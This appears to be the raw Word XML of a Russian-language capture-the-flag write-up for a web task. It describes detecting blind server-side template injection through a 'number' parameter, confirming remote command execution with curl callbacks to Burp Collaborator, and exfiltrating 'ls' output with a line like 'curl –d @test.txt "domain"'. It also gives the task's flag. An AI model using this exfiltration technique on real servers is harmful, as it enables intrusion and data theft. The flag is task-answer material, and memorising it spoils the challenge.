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34" w:rsidRDefault="00585534">
      <w:r>
        <w:t>Попробуй угадай</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585534" w:rsidRDefault="00585534">
      <w:r>
        <w:t>Нас встречает главная страница</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585534" w:rsidRDefault="00585534">
      <w:r w:rsidRPr="00585534">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29018136" wp14:editId="26B6DD5E">
            <wp:extent cx="6120130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03" w:rsidRDefault="00585534">
      <w:r>
        <w:t xml:space="preserve">1. Любое задание </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>на веб</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> начинаем с изучения кода страницы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585534" w:rsidRDefault="00585534">
      <w:r w:rsidRPr="00585534">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206364F8" wp14:editId="371013F3">
            <wp:extent cx="6120130" cy="204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34" w:rsidRDefault="00585534">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00D90E95">
        <w:t xml:space="preserve">Из кода страницы узнаём, что для того чтобы отправлять числа надо формировать запрос с </w:t>
      </w:r>
      <w:r w:rsidR="00D90E95">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="00D90E95">
        <w:t xml:space="preserve">-параметром number. И находим подсказку про шаблоны. Очевидно, что это намёк на один из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D90E95">
        <w:t>шаблонизаторов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D90E95">
        <w:t xml:space="preserve">, осталось узнать какой используется, проведя несколько тестов. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90E95" w:rsidRDefault="00D90E95">
      <w:r w:rsidRPr="008568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788393" wp14:editId="235C8AC0">
            <wp:extent cx="5940425" cy="3606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95" w:rsidRDefault="00D90E95">
      <w:r>
        <w:t xml:space="preserve">3. Однако сервер не возвращает нам прямого ответа, который мог бы подтвердить исполнение шаблона. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90E95" w:rsidRDefault="00D90E95">
      <w:r w:rsidRPr="00D90E95">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F233776" wp14:editId="1F4DD848">
            <wp:extent cx="6120130" cy="3661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95" w:rsidRPr="00D90E95" w:rsidRDefault="00D90E95" w:rsidP="00D90E95">
      <w:r>
        <w:t>Но мы не сдаёмся и отправляем на сервер тип данных не подходящий под число и видим, что сервер ответил нам «Это даже не число», из этого делаем вывод что шаблон, отправленный до этого, собрался в 49, и сервер посчитал его числом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90E95" w:rsidRDefault="00D90E95" w:rsidP="00D90E95">
      <w:r w:rsidRPr="00D90E95">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104DA3FD" wp14:editId="267992F1">
            <wp:extent cx="6120130" cy="3640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95" w:rsidRDefault="00D90E95" w:rsidP="00D90E95"/>
    <w:p w:rsidR="00D90E95" w:rsidRPr="0006222C" w:rsidRDefault="00D90E95" w:rsidP="00D90E95">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:r w:rsidRPr="0006222C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSTI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90E95" w:rsidRPr="0006222C" w:rsidRDefault="0006222C" w:rsidP="00D90E95">
      <w:r>
        <w:t xml:space="preserve">Находим нужный нам </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="0006222C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и проверим выполнение через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> постучавшись, например, на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="0006222C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>collaborator</w:t>
      </w:r>
      <w:r w:rsidRPr="0006222C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006222C" w:rsidRDefault="0006222C" w:rsidP="00D90E95">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006222C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5C867A" wp14:editId="6F78F7C5">
            <wp:extent cx="6120130" cy="339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95" w:rsidRDefault="0006222C" w:rsidP="0006222C">
      <w:r>
        <w:t xml:space="preserve">И видим успех. Запрос пришёл, а значит команды выполняются. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006222C" w:rsidRDefault="0006222C" w:rsidP="0006222C">
      <w:r w:rsidRPr="0006222C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F9E1B9D" wp14:editId="1025A5BF">
            <wp:extent cx="6120130" cy="27158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2C" w:rsidRDefault="0006222C" w:rsidP="0006222C"/>
    <w:p w:rsidR="0006222C" w:rsidRDefault="0006222C" w:rsidP="0006222C">
      <w:r>
        <w:t xml:space="preserve">Теперь запишем результат выполнения команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="0006222C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и вышлем с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="0006222C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файл с результатом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006222C" w:rsidRDefault="0006222C" w:rsidP="0006222C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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&gt; test.txt; curl –d @test.txt “domain”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006222C" w:rsidRDefault="0006222C" w:rsidP="0006222C">
      <w:r>
        <w:t xml:space="preserve">И нам придёт результат выполнения </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0006222C" w:rsidRDefault="0006222C" w:rsidP="0006222C">
      <w:r w:rsidRPr="0006222C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C972B43" wp14:editId="5420CC5B">
            <wp:extent cx="6120130" cy="24904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2C" w:rsidRPr="004C5D85" w:rsidRDefault="0006222C" w:rsidP="0006222C">
      <w:r>
        <w:t>Таким образом мы можем выполнить команды для поиска флага</w:t>
      </w:r>
      <w:r w:rsidR="004C5D85">
        <w:t xml:space="preserve"> системе</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C5D85">
        <w:t>например</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C5D85">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C5D85">
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0006222C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C5D85">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C5D85">
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004C5D85">
        <w:t xml:space="preserve">, после чего выслать его себе благодаря </w:t>
      </w:r>
      <w:r w:rsidR="004C5D85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C5D85" w:rsidRPr="004C5D85" w:rsidRDefault="004C5D85" w:rsidP="0006222C">
      <w:r>
        <w:t xml:space="preserve">Флаг: </w:t>
      </w:r>
      <w:r w:rsidRPr="004C5D85">
        <w:t>RDGCTF{wh4t_ab0ut_fu11_bl1nd_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r w:rsidRPr="004C5D85">
        <w:t>t1?}</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="004C5D85" w:rsidRPr="004C5D85" w:rsidSect="00D534FD"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34"/>
    <w:rsid w:val="0006222C"/>
    <w:rsid w:val="001A74F5"/>
    <w:rsid w:val="0048146D"/>
    <w:rsid w:val="004C5D85"/>
    <w:rsid w:val="00585534"/>
    <w:rsid w:val="00D534FD"/>
    <w:rsid w:val="00D7216B"/>
    <w:rsid w:val="00D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9D1B0-9DB3-4AC5-91F7-EFC8DC47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2024-04-07T12:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-07T12:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>